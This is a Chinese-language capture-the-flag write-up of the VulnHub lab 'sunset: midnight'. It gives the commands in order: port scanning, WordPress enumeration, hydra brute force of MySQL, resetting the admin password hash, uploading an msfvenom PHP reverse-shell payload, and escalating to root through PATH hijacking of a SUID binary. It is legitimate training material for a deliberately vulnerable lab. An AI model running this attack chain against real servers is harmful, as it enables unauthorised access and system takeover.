PJzhang:vulnhub靶机sunset系列SUNSET:MIDNIGHT

猫宁~~~

地址：https://www.vulnhub.com/entry/sunset-midnight,517/

关注工具和思路。

nmap 192.168.43.0/24

靶机IP 192.168.43.113

nmap -A -p1-65535 192.168.43.113

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1

访问http://192.168.43.113/，跳转http://sunset-midnight/

vim /etc/hosts
192.168.43.113 sunset-midnight

访问http://sunset-midnight/，是一个wordpress网站

http://sunset-midnight/wp-login.php

wpscan --url http://sunset-midnight/ --enumerate u

wpscan --url http://sunset-midnight/ u admin -P mima.txt -t 100

hydra 192.168.43.113 mysql -l root -P /usr/share/wordlists/rockyou.txt -t 1

[3306][mysql] host: 192.168.43.113 login: root password: robert

出现unblock with 'mysqladmin flush-hosts'，重启靶机再次爆破

mysql -uroot -p -h sunset-midnight

show databases;
use wordpress_db;
show tables;
select user_pass from wp_users;
密码显示$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

123456 MD5加密为e10adc3949ba59abbe56e057f20f883e

update wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" where id=1;

wordpress后台账号密码是admin/123456

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw > muma.php

appearance---themes---上传muma.php

访问http://sunset-midnight/muma.php/，显示http://sunset-midnight/wp-content/uploads/2020/09/muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

访问http://sunset-midnight/wp-content/uploads/2020/09/muma.php，反弹shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/var/www/html/wordpress/wp-content/uploads/2020/09$

cat /etc/passwd
jose:x:1000:1000:jose,,,:/home/jose:/bin/bash，值得关注

进入/var/www/html/wordpress，查看wp-config.php

/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

https://www.cmd5.com/
https://www.somd5.com/

sudo -l 无法使用

su jose
密码是645dc5a8871d2a4269d4cbe23f6ae103

sudo -l用不了

寻找suid文件
find / -perm -u=s -type f 2>/dev/null

/usr/bin/status值得关注

cd /tmp
echo "/bin/bash" > service
chmod 777 service
echo $PATH
export PATH=/tmp:$PATH
status

获取root权限
root@midnight:/tmp#
cat user.txt，家目录
956a9564aa5632edca7b745c696f6575